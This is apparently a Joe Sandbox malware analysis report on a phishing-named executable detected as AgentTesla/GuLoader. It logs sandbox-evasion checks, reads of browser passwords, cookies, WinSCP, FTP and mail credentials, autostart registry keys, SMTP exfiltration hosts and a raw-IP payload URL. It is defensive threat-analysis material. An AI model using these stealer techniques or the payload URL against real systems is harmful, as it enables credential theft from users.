            Source: C:\Users\user\Desktop\RFQ678903423_PROD_INQUIRY_SHANG_NOG_INDUSTRYs.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
            Source: C:\Users\user\AppData\Roaming\vexplorers\vexplorers.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
            Source: C:\Users\user\Desktop\RFQ678903423_PROD_INQUIRY_SHANG_NOG_INDUSTRYs.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_ComputerSystem
            Source: C:\Users\user\AppData\Roaming\vexplorers\vexplorers.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_ComputerSystem
            Source: C:\Users\user\Desktop\RFQ678903423_PROD_INQUIRY_SHANG_NOG_INDUSTRYs.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
            Source: C:\Users\user\Desktop\RFQ678903423_PROD_INQUIRY_SHANG_NOG_INDUSTRYs.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
            Source: C:\Users\user\AppData\Roaming\vexplorers\vexplorers.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
            Source: C:\Users\user\AppData\Roaming\vexplorers\vexplorers.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
            Source: C:\Users\user\Desktop\RFQ678903423_PROD_INQUIRY_SHANG_NOG_INDUSTRYs.exeCode function: 0_2_0040635D FindFirstFileW,FindClose,0_2_0040635D
            Source: C:\Users\user\Desktop\RFQ678903423_PROD_INQUIRY_SHANG_NOG_INDUSTRYs.exeCode function: 0_2_0040580B GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,0_2_0040580B
            Source: C:\Users\user\Desktop\RFQ678903423_PROD_INQUIRY_SHANG_NOG_INDUSTRYs.exeCode function: 0_2_004027FB FindFirstFileW,0_2_004027FB
            Source: C:\Users\user\Desktop\RFQ678903423_PROD_INQUIRY_SHANG_NOG_INDUSTRYs.exeCode function: 2_2_0040635D FindFirstFileW,FindClose,2_2_0040635D
            Source: C:\Users\user\Desktop\RFQ678903423_PROD_INQUIRY_SHANG_NOG_INDUSTRYs.exeCode function: 2_2_0040580B GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,2_2_0040580B
            Source: C:\Users\user\Desktop\RFQ678903423_PROD_INQUIRY_SHANG_NOG_INDUSTRYs.exeCode function: 2_2_004027FB FindFirstFileW,2_2_004027FB
            Source: C:\Users\user\Desktop\RFQ678903423_PROD_INQUIRY_SHANG_NOG_INDUSTRYs.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Users\user\Desktop\RFQ678903423_PROD_INQUIRY_SHANG_NOG_INDUSTRYs.exeThread delayed: delay time: 600000Jump to behavior
            Source: C:\Users\user\AppData\Roaming\vexplorers\vexplorers.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Users\user\AppData\Roaming\vexplorers\vexplorers.exeThread delayed: delay time: 600000Jump to behavior
            Source: C:\Users\user\Desktop\RFQ678903423_PROD_INQUIRY_SHANG_NOG_INDUSTRYs.exeAPI call chain: ExitProcess graph end nodegraph_0-4515
            Source: C:\Users\user\Desktop\RFQ678903423_PROD_INQUIRY_SHANG_NOG_INDUSTRYs.exeAPI call chain: ExitProcess graph end nodegraph_0-4520
            Source: C:\Users\user\AppData\Roaming\vexplorers\vexplorers.exeProcess queried: DebugPort
            Source: C:\Users\user\Desktop\RFQ678903423_PROD_INQUIRY_SHANG_NOG_INDUSTRYs.exeCode function: 0_2_10001B18 GlobalAlloc,lstrcpyW,lstrcpyW,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,lstrcpyW,GetModuleHandleW,LoadLibraryW,GetProcAddress,lstrlenW,0_2_10001B18
            Source: C:\Users\user\Desktop\RFQ678903423_PROD_INQUIRY_SHANG_NOG_INDUSTRYs.exeProcess token adjusted: DebugJump to behavior
            Source: C:\Users\user\Desktop\RFQ678903423_PROD_INQUIRY_SHANG_NOG_INDUSTRYs.exeMemory allocated: page read and write | page guardJump to behavior
            Source: C:\Users\user\Desktop\RFQ678903423_PROD_INQUIRY_SHANG_NOG_INDUSTRYs.exeProcess created: C:\Users\user\Desktop\RFQ678903423_PROD_INQUIRY_SHANG_NOG_INDUSTRYs.exe "C:\Users\user\Desktop\RFQ678903423_PROD_INQUIRY_SHANG_NOG_INDUSTRYs.exe"Jump to behavior
            Source: C:\Users\user\AppData\Roaming\vexplorers\vexplorers.exeProcess created: C:\Users\user\AppData\Roaming\vexplorers\vexplorers.exe "C:\Users\user\AppData\Roaming\vexplorers\vexplorers.exe" Jump to behavior
            Source: C:\Users\user\Desktop\RFQ678903423_PROD_INQUIRY_SHANG_NOG_INDUSTRYs.exeQueries volume information: C:\Users\user\Desktop\RFQ678903423_PROD_INQUIRY_SHANG_NOG_INDUSTRYs.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\RFQ678903423_PROD_INQUIRY_SHANG_NOG_INDUSTRYs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\RFQ678903423_PROD_INQUIRY_SHANG_NOG_INDUSTRYs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
            Source: C:\Users\user\AppData\Roaming\vexplorers\vexplorers.exeQueries volume information: C:\Users\user\AppData\Roaming\vexplorers\vexplorers.exe VolumeInformationJump to behavior
            Source: C:\Users\user\AppData\Roaming\vexplorers\vexplorers.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformationJump to behavior
            Source: C:\Users\user\AppData\Roaming\vexplorers\vexplorers.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\RFQ678903423_PROD_INQUIRY_SHANG_NOG_INDUSTRYs.exeCode function: 0_2_0040326A EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,GetModuleHandleW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,OleUninitialize,ExitProcess,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,0_2_0040326A
            Source: C:\Users\user\Desktop\RFQ678903423_PROD_INQUIRY_SHANG_NOG_INDUSTRYs.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

            Stealing of Sensitive Information

            barindex
            Source: C:\Users\user\Desktop\RFQ678903423_PROD_INQUIRY_SHANG_NOG_INDUSTRYs.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\SessionsJump to behavior
            Source: C:\Users\user\AppData\Roaming\vexplorers\vexplorers.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\SessionsJump to behavior
            Source: C:\Users\user\AppData\Roaming\vexplorers\vexplorers.exeFile opened: C:\Users\user\AppData\Roaming\8pecxstudios\Cyberfox\profiles.iniJump to behavior
            Source: C:\Users\user\AppData\Roaming\vexplorers\vexplorers.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\ol7uiqa8.default-release\cookies.sqliteJump to behavior
            Source: C:\Users\user\AppData\Roaming\vexplorers\vexplorers.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
            Source: C:\Users\user\AppData\Roaming\vexplorers\vexplorers.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.iniJump to behavior
            Source: C:\Users\user\AppData\Roaming\vexplorers\vexplorers.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
            Source: C:\Users\user\AppData\Roaming\vexplorers\vexplorers.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\CookiesJump to behavior
            Source: C:\Users\user\AppData\Roaming\vexplorers\vexplorers.exeFile opened: C:\Users\user\AppData\Roaming\NETGATE Technologies\BlackHawk\profiles.iniJump to behavior
            Source: C:\Users\user\AppData\Roaming\vexplorers\vexplorers.exeFile opened: C:\FTP Navigator\Ftplist.txtJump to behavior
            Source: C:\Users\user\Desktop\RFQ678903423_PROD_INQUIRY_SHANG_NOG_INDUSTRYs.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.iniJump to behavior
            Source: C:\Users\user\Desktop\RFQ678903423_PROD_INQUIRY_SHANG_NOG_INDUSTRYs.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.iniJump to behavior
            Source: C:\Users\user\Desktop\RFQ678903423_PROD_INQUIRY_SHANG_NOG_INDUSTRYs.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\ProfilesJump to behavior
            Source: C:\Users\user\Desktop\RFQ678903423_PROD_INQUIRY_SHANG_NOG_INDUSTRYs.exeKey opened: HKEY_CURRENT_USER\Software\IncrediMail\IdentitiesJump to behavior
            Source: C:\Users\user\AppData\Roaming\vexplorers\vexplorers.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.iniJump to behavior
            Source: C:\Users\user\AppData\Roaming\vexplorers\vexplorers.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.iniJump to behavior
            Source: C:\Users\user\AppData\Roaming\vexplorers\vexplorers.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\ProfilesJump to behavior
            Source: C:\Users\user\AppData\Roaming\vexplorers\vexplorers.exeKey opened: HKEY_CURRENT_USER\Software\IncrediMail\IdentitiesJump to behavior
            Source: Yara matchFile source: 00000005.00000002.111729282817.0000000037E34000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000002.111728526533.0000000037C14000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
            Gather Victim Identity InformationAcquire InfrastructureValid Accounts231
            Windows Management Instrumentation
            1
            DLL Side-Loading
            1
            DLL Side-Loading
            1
            Disable or Modify Tools
            2
            OS Credential Dumping
            3
            File and Directory Discovery
            Remote Services1
            Archive Collected Data
            1
            Ingress Tool Transfer
            Exfiltration Over Other Network Medium1
            System Shutdown/Reboot
            CredentialsDomainsDefault Accounts1
            Native API
            111
            Registry Run Keys / Startup Folder
            1
            Access Token Manipulation
            1
            Deobfuscate/Decode Files or Information
            1
            Credentials in Registry
            36
            System Information Discovery
            Remote Desktop Protocol2
            Data from Local System
            21
            Encrypted Channel
            Exfiltration Over BluetoothNetwork Denial of Service
            Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)11
            Process Injection
            2
            Obfuscated Files or Information
            Security Account Manager43
            Security Software Discovery
            SMB/Windows Admin Shares1
            Email Collection
            1
            Non-Standard Port
            Automated ExfiltrationData Encrypted for Impact
            Employee NamesVirtual Private ServerLocal AccountsCronLogin Hook111
            Registry Run Keys / Startup Folder
            1
            DLL Side-Loading
            NTDS261
            Virtualization/Sandbox Evasion
            Distributed Component Object Model1
            Clipboard Data
            2
            Non-Application Layer Protocol
            Traffic DuplicationData Destruction
            Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
            Masquerading
            LSA Secrets1
            System Network Configuration Discovery
            SSHKeylogging23
            Application Layer Protocol
            Scheduled TransferData Encrypted for Impact
            Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts261
            Virtualization/Sandbox Evasion
            Cached Domain CredentialsWi-Fi DiscoveryVNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
            DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
            Access Token Manipulation
            DCSyncRemote System DiscoveryWindows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
            Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job11
            Process Injection
            Proc FilesystemSystem Owner/User DiscoveryCloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
            Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt1
            Hidden Files and Directories
            /etc/passwd and /etc/shadowNetwork SniffingDirect Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
            Hide Legend

            Legend:

            • Process
            • Signature
            • Created File
            • DNS/IP Info
            • Is Dropped
            • Is Windows Process
            • Number of created Registry Values
            • Number of created Files
            • Visual Basic
            • Delphi
            • Java
            • .Net C# or VB.NET
            • C, C++ or other language
            • Is malicious
            • Internet
            behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1437983 Sample: RFQ678903423_PROD_INQUIRY_S... Startdate: 08/05/2024 Architecture: WINDOWS Score: 100 36 smtp.zoho.eu 2->36 38 ip-api.com 2->38 40 api.ipify.org 2->40 60 Multi AV Scanner detection for dropped file 2->60 62 Multi AV Scanner detection for submitted file 2->62 64 Yara detected GuLoader 2->64 66 4 other signatures 2->66 7 RFQ678903423_PROD_INQUIRY_SHANG_NOG_INDUSTRYs.exe 40 2->7         started        11 vexplorers.exe 24 2->11         started        13 vexplorers.exe 24 2->13         started        signatures3 process4 file5 30 C:\Users\user\AppData\Local\...\System.dll, PE32 7->30 dropped 68 Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines) 7->68 70 Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines) 7->70 15 RFQ678903423_PROD_INQUIRY_SHANG_NOG_INDUSTRYs.exe 18 13 7->15         started        32 C:\Users\user\AppData\Local\...\System.dll, PE32 11->32 dropped 72 Multi AV Scanner detection for dropped file 11->72 74 Machine Learning detection for dropped file 11->74 20 vexplorers.exe 14 9 11->20         started        34 C:\Users\user\AppData\Local\...\System.dll, PE32 13->34 dropped 22 WerFault.exe 13->22         started        signatures6 process7 dnsIp8 42 ip-api.com 208.95.112.1, 51319, 51325, 80 TUT-ASUS United States 15->42 44 smtp.zoho.eu 185.230.214.164, 51320, 51326, 587 COMPUTERLINEComputerlineSchlierbachSwitzerlandCH Netherlands 15->44 46 2 other IPs or domains 15->46 24 C:\Users\user\AppData\...\vexplorers.exe, PE32 15->24 dropped 26 C:\Users\user\AppData\...\Henequin.exe, PE32 15->26 dropped 28 C:\Users\...\vexplorers.exe:Zone.Identifier, ASCII 15->28 dropped 48 Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc) 15->48 50 Tries to steal Mail credentials (via file / registry access) 15->50 52 Creates multiple autostart registry keys 15->52 54 Hides that the sample has been downloaded from the Internet (zone.identifier) 15->54 56 Tries to harvest and steal ftp login credentials 20->56 58 Tries to harvest and steal browser information (history, passwords, etc) 20->58 file9 signatures10

            This section contains all screenshots as thumbnails, including those not shown in the slideshow.


            windows-stand
            SourceDetectionScannerLabelLink
            RFQ678903423_PROD_INQUIRY_SHANG_NOG_INDUSTRYs.exe18%ReversingLabs
            RFQ678903423_PROD_INQUIRY_SHANG_NOG_INDUSTRYs.exe100%Joe Sandbox ML
            RFQ678903423_PROD_INQUIRY_SHANG_NOG_INDUSTRYs.exe17%VirustotalBrowse
            SourceDetectionScannerLabelLink
            C:\Users\user\AppData\Roaming\vexplorers\vexplorers.exe100%Joe Sandbox ML
            C:\Users\user\AppData\Roaming\Outgaming\Henequin.exe100%Joe Sandbox ML
            C:\Users\user\AppData\Local\Temp\nsiFB67.tmp\System.dll0%ReversingLabs
            C:\Users\user\AppData\Local\Temp\nsiFB67.tmp\System.dll0%VirustotalBrowse
            C:\Users\user\AppData\Local\Temp\nsn397A.tmp\System.dll0%ReversingLabs
            C:\Users\user\AppData\Local\Temp\nsn397A.tmp\System.dll0%VirustotalBrowse
            C:\Users\user\AppData\Local\Temp\nsu3FA9.tmp\System.dll0%ReversingLabs
            C:\Users\user\AppData\Roaming\Outgaming\Henequin.exe18%ReversingLabs
            C:\Users\user\AppData\Roaming\vexplorers\vexplorers.exe18%ReversingLabs
            No Antivirus matches
            No Antivirus matches
            SourceDetectionScannerLabelLink
            https://ocsp.quovadisoffshore.com00%Avira URL Cloudsafe
            http://167.160.166.205/LkTupLMJe71.bin0%Avira URL Cloudsafe
            http://www.quovadis.bm00%Avira URL Cloudsafe
            http://167.160.166.205/LkTupLMJe71.bin4%VirustotalBrowse
            NameIPActiveMaliciousAntivirus DetectionReputation
            smtp.zoho.eu
            185.230.214.164
            truefalse
              high
              api.ipify.org
              172.67.74.152
              truefalse
                high
                ip-api.com
                208.95.112.1
                truefalse
                  high
                  NameMaliciousAntivirus DetectionReputation
                  https://api.ipify.org/false
                    high
                    http://167.160.166.205/LkTupLMJe71.binfalse
                    • 4%, Virustotal, Browse
                    • Avira URL Cloud: safe
                    unknown
                    http://ip-api.com/line/?fields=hostingfalse
                      high
                      NameSourceMaliciousAntivirus DetectionReputation
                      http://www.quovadis.bm0RFQ678903423_PROD_INQUIRY_SHANG_NOG_INDUSTRYs.exe, 00000002.00000003.107000245048.000000003A2AA000.00000004.00000020.00020000.00000000.sdmpfalse
                      • Avira URL Cloud: safe
                      unknown
                      https://api.ipify.orgRFQ678903423_PROD_INQUIRY_SHANG_NOG_INDUSTRYs.exe, 00000002.00000002.111728526533.0000000037BB1000.00000004.00000800.00020000.00000000.sdmpfalse
                        high
                        http://nsis.sf.net/NSIS_ErrorErrorRFQ678903423_PROD_INQUIRY_SHANG_NOG_INDUSTRYs.exe, 00000000.00000000.106615363046.0000000000409000.00000008.00000001.01000000.00000003.sdmp, RFQ678903423_PROD_INQUIRY_SHANG_NOG_INDUSTRYs.exe, 00000000.00000002.106938656716.0000000000409000.00000004.00000001.01000000.00000003.sdmpfalse
                          high
                          https://api.ipify.org/tRFQ678903423_PROD_INQUIRY_SHANG_NOG_INDUSTRYs.exe, 00000002.00000002.111728526533.0000000037BB1000.00000004.00000800.00020000.00000000.sdmpfalse
                            high
                            https://ocsp.quovadisoffshore.com0RFQ678903423_PROD_INQUIRY_SHANG_NOG_INDUSTRYs.exe, 00000002.00000003.107000245048.000000003A2AA000.00000004.00000020.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            unknown
                            http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameRFQ678903423_PROD_INQUIRY_SHANG_NOG_INDUSTRYs.exe, 00000002.00000002.111728526533.0000000037BB1000.00000004.00000800.00020000.00000000.sdmpfalse
                              high
                              • No. of IPs < 25%
                              • 25% < No. of IPs < 50%
                              • 50% < No. of IPs < 75%
                              • 75% < No. of IPs
                              IPDomainCountryFlagASNASN NameMalicious
                              208.95.112.1
                              ip-api.comUnited States
                              53334TUT-ASUSfalse
                              167.160.166.205
                              unknownUnited States
                              8100ASN-QUADRANET-GLOBALUSfalse
                              185.230.214.164
                              smtp.zoho.euNetherlands
                              41913COMPUTERLINEComputerlineSchlierbachSwitzerlandCHfalse
                              172.67.74.152
                              api.ipify.orgUnited States
                              13335CLOUDFLARENETUSfalse
                              Joe Sandbox version:40.0.0 Tourmaline
                              Analysis ID:1437983
                              Start date and time:2024-05-08 09:38:37 +02:00
                              Joe Sandbox product:CloudBasic
                              Overall analysis duration:0h 18m 35s
                              Hypervisor based Inspection enabled:false
                              Report type:full
                              Cookbook file name:default.jbs
                              Analysis system description:Windows 10 64 bit 20H2 Native physical Machine for testing VM-aware malware (Office 2019, Chrome 93, Firefox 91, Adobe Reader DC 21, Java 8 Update 301
                              Run name:Suspected Instruction Hammering
                              Number of analysed new started processes analysed:11
                              Number of new started drivers analysed:0
                              Number of existing processes analysed:0
                              Number of existing drivers analysed:0
                              Number of injected processes analysed:0
                              Technologies:
                              • HCA enabled
                              • EGA enabled
                              • AMSI enabled
                              Analysis Mode:default
                              Analysis stop reason:Timeout
                              Sample name:RFQ678903423_PROD_INQUIRY_SHANG_NOG_INDUSTRYs.exe
                              Detection:MAL
                              Classification:mal100.troj.spyw.evad.winEXE@8/23@4/4
                              EGA Information:
                              • Successful, ratio: 75%
                              HCA Information:
                              • Successful, ratio: 92%
                              • Number of executed functions: 169
                              • Number of non-executed functions: 88
                              Cookbook Comments:
                              • Found application associated with file extension: .exe
                              • Sleeps bigger than 100000000ms are automatically reduced to 1000ms
                              • Exclude process from analysis (whitelisted): dllhost.exe, WerFault.exe, svchost.exe
                              • Excluded IPs from analysis (whitelisted): 20.42.65.92
                              • Excluded domains from analysis (whitelisted): onedsblobprdeus17.eastus.cloudapp.azure.com, login.live.com, blobcollector.events.data.trafficmanager.net, ctldl.windowsupdate.com, umwatson.events.data.microsoft.com
                              • HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                              • Report creation exceeded maximum time and may have missing disassembly code information.
                              • Report size exceeded maximum capacity and may have missing behavior information.
                              • Report size getting too big, too many NtOpenKeyEx calls found.
                              • Report size getting too big, too many NtProtectVirtualMemory calls found.
                              • Report size getting too big, too many NtQueryValueKey calls found.
                              • Report size getting too big, too many NtReadVirtualMemory calls found.
                              TimeTypeDescription
                              08:41:08AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\RunOnce Tekstrkkerne C:\Users\user\AppData\Roaming\Outgaming\Henequin.exe
                              08:41:16AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\Run vexplorers C:\Users\user\AppData\Roaming\vexplorers\vexplorers.exe
                              08:41:24AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\RunOnce Tekstrkkerne C:\Users\user\AppData\Roaming\Outgaming\Henequin.exe
                              08:41:32AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run vexplorers C:\Users\user\AppData\Roaming\vexplorers\vexplorers.exe
                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                              208.95.112.1-I122825.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                              • ip-api.com/line/?fields=hosting
                              hesaphareketi-01.bat.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                              • ip-api.com/line/?fields=hosting
                              Swift Copy_HSBC Bank_pdf.bat.exeGet hashmaliciousAgentTeslaBrowse
                              • ip-api.com/line/?fields=hosting
                              RFQ678903423_PROD_INQUIRY_SHANG_NOG_INDUSTRY.exeGet hashmaliciousAgentTeslaBrowse
                              • ip-api.com/line/?fields=hosting
                              QUOTATION_MAYQTRA031244#U00b7PDF.scr.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                              • ip-api.com/line/?fields=hosting
                              Purchase Order - PO24108267.vbsGet hashmaliciousAgentTesla, GuLoaderBrowse
                              • ip-api.com/line/?fields=hosting
                              Invoice-883973938.jsGet hashmaliciousWSHRATBrowse
                              • ip-api.com/json/
                              Invoice Payment N8977823.jsGet hashmaliciousWSHRATBrowse
                              • ip-api.com/json/
                              _____PDF.exeGet hashmaliciousAgentTeslaBrowse
                              • ip-api.com/line/?fields=hosting
                              Pending_Invoice_Bank_Details_XLSX.jsGet hashmaliciousWSHRATBrowse
                              • ip-api.com/json/
                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                              ip-api.com-I122825.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                              • 208.95.112.1
                              hesaphareketi-01.bat.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                              • 208.95.112.1
                              Swift Copy_HSBC Bank_pdf.bat.exeGet hashmaliciousAgentTeslaBrowse
                              • 208.95.112.1
                              RFQ678903423_PROD_INQUIRY_SHANG_NOG_INDUSTRY.exeGet hashmaliciousAgentTeslaBrowse
                              • 208.95.112.1
                              QUOTATION_MAYQTRA031244#U00b7PDF.scr.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                              • 208.95.112.1
                              Purchase Order - PO24108267.vbsGet hashmaliciousAgentTesla, GuLoaderBrowse
                              • 208.95.112.1
                              Invoice-883973938.jsGet hashmaliciousWSHRATBrowse
                              • 208.95.112.1
                              Invoice Payment N8977823.jsGet hashmaliciousWSHRATBrowse
                              • 208.95.112.1
                              _____PDF.exeGet hashmaliciousAgentTeslaBrowse
                              • 208.95.112.1
                              Pending_Invoice_Bank_Details_XLSX.jsGet hashmaliciousWSHRATBrowse
                              • 208.95.112.1
                              api.ipify.orgSwift Copy_HSBC Bank_pdf.bat.exeGet hashmaliciousAgentTeslaBrowse
                              • 172.67.74.152
                              RFQ678903423_PROD_INQUIRY_SHANG_NOG_INDUSTRY.exeGet hashmaliciousAgentTeslaBrowse
                              • 104.26.13.205
                              SecuriteInfo.com.Trojan-Downloader.Autoit.gen.6551.1850.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                              • 104.26.12.205
                              SecuriteInfo.com.Win32.TrojanX-gen.20995.10729.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                              • 104.26.13.205
                              Payment Advice.exeGet hashmaliciousAgentTeslaBrowse
                              • 104.26.13.205
                              https://seniorservice.co.za/?banner_click=true&banner_id=16535&href=http://0173316598494355.822094.actual-media.ro/de/?id=anna.pohl@bacvb.comGet hashmaliciousHTMLPhisherBrowse
                              • 172.67.74.152
                              swift copy.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                              • 172.67.74.152
                              Shipping Documents.pdf.exeGet hashmaliciousAgentTeslaBrowse
                              • 172.67.74.152
                              swift copy.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                              • 172.67.74.152
                              http://t.co/QwLoYDFPoZGet hashmaliciousHTMLPhisherBrowse
                              • 104.26.13.205
                              smtp.zoho.euRFQ678903423_PROD_INQUIRY_SHANG_NOG_INDUSTRY.exeGet hashmaliciousAgentTeslaBrowse
                              • 185.230.214.164
                              INQUIRY#46789_MAY24_PLANEX_SERVICES_CONTRACTING_GOODS.exeGet hashmaliciousAgentTeslaBrowse
                              • 185.230.214.164
                              VBG dk Payment Receipt --doc87349281.batGet hashmaliciousRemcos, AgentTesla, DBatLoaderBrowse
                              • 185.230.214.164
                              RFQ_on_SAK-TC233L-32F200N_INFINEON_PN_PHARMA.pdf.exeGet hashmaliciousAgentTeslaBrowse
                              • 89.36.170.164
                              1qwF1J2Njh.exeGet hashmaliciousAgentTeslaBrowse
                              • 185.230.212.164
                              N8USBRwo0Z.exeGet hashmaliciousAgentTeslaBrowse
                              • 89.36.170.164
                              PURCHASE_ORDER.exeGet hashmaliciousAgentTesla, zgRATBrowse
                              • 89.36.170.164
                              New Enquiry List.exeGet hashmaliciousAgentTeslaBrowse
                              • 185.20.209.164
                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                              COMPUTERLINEComputerlineSchlierbachSwitzerlandCHRFQ678903423_PROD_INQUIRY_SHANG_NOG_INDUSTRY.exeGet hashmaliciousAgentTeslaBrowse
                              • 185.230.214.164
                              INQUIRY#46789_MAY24_PLANEX_SERVICES_CONTRACTING_GOODS.exeGet hashmaliciousAgentTeslaBrowse
                              • 185.230.214.164
                              https://classic.dreamclass.io/pages/admissions/form/BvtxckGet hashmaliciousUnknownBrowse
                              • 185.230.212.28
                              http://www.multipli.com.auGet hashmaliciousUnknownBrowse
                              • 185.230.212.28
                              https://workdrive.zohoexternal.com/external/2c63de0fdd4c89e3b1929ff054753df29586989db597aec11b0424839e9707da/downloadGet hashmaliciousUnknownBrowse
                              • 185.230.212.52
                              https://survey.zohopublic.eu/zs/GzDXvpGet hashmaliciousHTMLPhisherBrowse
                              • 185.230.212.19
                              https://site24x7.comGet hashmaliciousUnknownBrowse
                              • 185.230.212.11
                              https://workdrive.zoho.eu/file/17s6p7fb7d86e6c7d46b790f74da739ebdd8dGet hashmaliciousUnknownBrowse
                              • 185.230.212.52
                              EGpGxFlJO8.exeGet hashmaliciousGlupteba, Mars Stealer, SmokeLoader, Stealc, VidarBrowse
                              • 89.36.170.166
                              VBG dk Payment Receipt --doc87349281.batGet hashmaliciousRemcos, AgentTesla, DBatLoaderBrowse
                              • 185.230.214.164
                              ASN-QUADRANET-GLOBALUSINQUIRY#46789-MAY_product_materials.exeGet hashmaliciousRemcosBrowse
                              • 64.188.26.202
                              NEW_INQUIRY#46789_MAY24_PLANEX_SERVICES_CONTRACTING_GOODS.exeGet hashmaliciousRemcosBrowse
                              • 64.188.26.202
                              bot.mips.elfGet hashmaliciousUnknownBrowse
                              • 23.163.68.154
                              bot.arm.elfGet hashmaliciousMiraiBrowse
                              • 23.153.78.240
                              INQUIRY#46789-APRIL24_MAT_PRODUC_SAMPLE_PRODUCT.exeGet hashmaliciousRemcosBrowse
                              • 64.188.18.137
